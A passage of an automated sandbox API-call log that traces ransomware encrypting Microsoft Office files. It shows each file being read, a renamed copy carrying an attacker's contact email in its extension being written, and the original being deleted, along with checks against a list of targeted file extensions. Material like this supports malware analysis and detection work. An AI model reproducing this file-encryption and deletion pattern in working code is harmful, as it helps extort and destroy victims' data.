0xffffffff [0273.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.986] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.986] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0273.987] GetLastError () returned 0x0 [0273.987] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x9380, lpOverlapped=0x0) returned 1 [0273.995] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x9390, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x9390, lpOverlapped=0x0) returned 1 [0273.996] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.996] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfc, lpOverlapped=0x0) returned 1 [0273.996] SetEndOfFile (hFile=0x3c0) returned 1 [0273.996] CloseHandle (hObject=0x3c0) returned 1 [0273.996] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.996] SetEndOfFile (hFile=0x39c) returned 1 [0274.217] CloseHandle (hObject=0x39c) returned 1 [0274.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.317] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll")) returned 1 [0274.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.371] lstrlenW (lpString=".doc") returned 4 [0274.371] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString=".docx") returned 5 [0274.371] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0274.371] lstrlenW (lpString=".pdf") returned 4 [0274.371] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString=".xls") returned 4 [0274.371] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString=".xlsx") returned 5 [0274.371] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0274.371] lstrlenW (lpString=".ppt") returned 4 [0274.371] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.371] lstrlenW (lpString=".zip") returned 4 [0274.371] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString=".rar") returned 4 [0274.371] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0274.371] lstrlenW (lpString=".bz2") returned 4 [0274.372] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".7z") returned 3 [0274.372] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString=".dbf") returned 4 [0274.372] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString=".1cd") returned 4 [0274.372] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString=".jpg") returned 4 [0274.372] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString=".doc") returned 4 [0274.372] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".docx") returned 5 [0274.372] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0274.372] lstrlenW (lpString=".pdf") returned 4 [0274.372] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".xls") returned 4 [0274.372] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".xlsx") returned 5 [0274.372] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0274.372] lstrlenW (lpString=".ppt") returned 4 [0274.372] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.372] lstrlenW (lpString=".zip") returned 4 [0274.372] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".rar") returned 4 [0274.372] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0274.372] lstrlenW (lpString=".bz2") returned 4 [0274.373] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0274.373] lstrlenW (lpString=".7z") returned 3 [0274.373] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.373] lstrlenW (lpString=".dbf") returned 4 [0274.373] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0274.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.373] lstrlenW (lpString=".1cd") returned 4 [0274.373] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0274.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL") returned 68 [0274.373] lstrlenW (lpString=".jpg") returned 4 [0274.373] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0274.373] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0274.373] lstrlenW (lpString="INFOPATH_COL.HXC") returned 16 [0274.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.383] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=636) returned 1 [0274.383] CloseHandle (hObject=0x2ac) returned 1 [0274.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 0x20 [0274.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.384] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.384] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.384] GetLastError () returned 0x0 [0274.384] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x27c, lpOverlapped=0x0) returned 1 [0274.386] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x280, lpOverlapped=0x0) returned 1 [0274.387] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.387] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0274.387] SetEndOfFile (hFile=0x3c0) returned 1 [0274.387] CloseHandle (hObject=0x3c0) returned 1 [0274.387] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.387] SetEndOfFile (hFile=0x2ac) returned 1 [0274.389] CloseHandle (hObject=0x2ac) returned 1 [0274.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.389] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 1 [0274.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.389] lstrlenW (lpString=".doc") returned 4 [0274.389] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.389] lstrlenW (lpString=".docx") returned 5 [0274.389] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.389] lstrlenW (lpString=".pdf") returned 4 [0274.389] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.389] lstrlenW (lpString=".xls") returned 4 [0274.389] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.389] lstrlenW (lpString=".xlsx") returned 5 [0274.389] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.389] lstrlenW (lpString=".ppt") returned 4 [0274.389] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.389] lstrlenW (lpString=".zip") returned 4 [0274.389] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.389] lstrlenW (lpString=".rar") returned 4 [0274.390] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.390] lstrlenW (lpString=".bz2") returned 4 [0274.390] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.390] lstrlenW (lpString=".7z") returned 3 [0274.390] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.390] lstrlenW (lpString=".dbf") returned 4 [0274.390] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.390] lstrlenW (lpString=".1cd") returned 4 [0274.390] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.390] lstrlenW (lpString=".jpg") returned 4 [0274.390] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.390] lstrlenW (lpString=".doc") returned 4 [0274.390] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.390] lstrlenW (lpString=".docx") returned 5 [0274.390] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.390] lstrlenW (lpString=".pdf") returned 4 [0274.390] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.390] lstrlenW (lpString=".xls") returned 4 [0274.390] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.390] lstrlenW (lpString=".xlsx") returned 5 [0274.390] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.390] lstrlenW (lpString=".ppt") returned 4 [0274.390] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.391] lstrlenW (lpString=".zip") returned 4 [0274.391] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.391] lstrlenW (lpString=".rar") returned 4 [0274.391] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.391] lstrlenW (lpString=".bz2") returned 4 [0274.391] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.391] lstrlenW (lpString=".7z") returned 3 [0274.391] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.391] lstrlenW (lpString=".dbf") returned 4 [0274.391] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.391] lstrlenW (lpString=".1cd") returned 4 [0274.391] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64 [0274.391] lstrlenW (lpString=".jpg") returned 4 [0274.391] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.391] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0274.391] lstrlenW (lpString="INFOPATH_COL.HXT") returned 16 [0274.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.391] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=208) returned 1 [0274.391] CloseHandle (hObject=0x2ac) returned 1 [0274.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 0x20 [0274.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.392] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.392] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.392] GetLastError () returned 0x0 [0274.392] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0xd0, lpOverlapped=0x0) returned 1 [0274.393] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0274.394] ReadFile (in: hFile=0x2ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.394] WriteFile (in: hFile=0x3c0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0274.394] SetEndOfFile (hFile=0x3c0) returned 1 [0274.394] CloseHandle (hObject=0x3c0) returned 1 [0274.394] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.394] SetEndOfFile (hFile=0x2ac) returned 1 [0274.396] CloseHandle (hObject=0x2ac) returned 1 [0274.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 1 [0274.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString=".doc") returned 4 [0274.397] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.397] lstrlenW (lpString=".docx") returned 5 [0274.397] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.397] lstrlenW (lpString=".pdf") returned 4 [0274.397] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString=".xls") returned 4 [0274.397] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString=".xlsx") returned 5 [0274.397] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.397] lstrlenW (lpString=".ppt") returned 4 [0274.397] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString=".zip") returned 4 [0274.397] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString=".rar") returned 4 [0274.397] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString=".bz2") returned 4 [0274.397] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.397] lstrlenW (lpString=".7z") returned 3 [0274.397] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString=".dbf") returned 4 [0274.397] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString=".1cd") returned 4 [0274.397] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.397] lstrlenW (lpString=".jpg") returned 4 [0274.397] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.398] lstrlenW (lpString=".doc") returned 4 [0274.398] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.398] lstrlenW (lpString=".docx") returned 5 [0274.398] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.398] lstrlenW (lpString=".pdf") returned 4 [0274.398] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.398] lstrlenW (lpString=".xls") returned 4 [0274.398] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.398] lstrlenW (lpString=".xlsx") returned 5 [0274.398] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.398] lstrlenW (lpString=".ppt") returned 4 [0274.398] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.398] lstrlenW (lpString=".zip") returned 4 [0274.398] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.398] lstrlenW (lpString=".rar") returned 4 [0274.398] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.398] lstrlenW (lpString=".bz2") returned 4 [0274.398] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.398] lstrlenW (lpString=".7z") returned 3 [0274.398] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.399] lstrlenW (lpString=".dbf") returned 4 [0274.399] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.399] lstrlenW (lpString=".1cd") returned 4 [0274.399] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64 [0274.399] lstrlenW (lpString=".jpg") returned 4 [0274.399] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.399] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.399] lstrlenW (lpString="INFOPATH_F_COL.HXK") returned 18 [0274.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.399] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=114) returned 1 [0274.399] CloseHandle (hObject=0x2ac) returned 1 [0274.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 0x20 [0274.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.400] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.400] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.400] CreateFileW 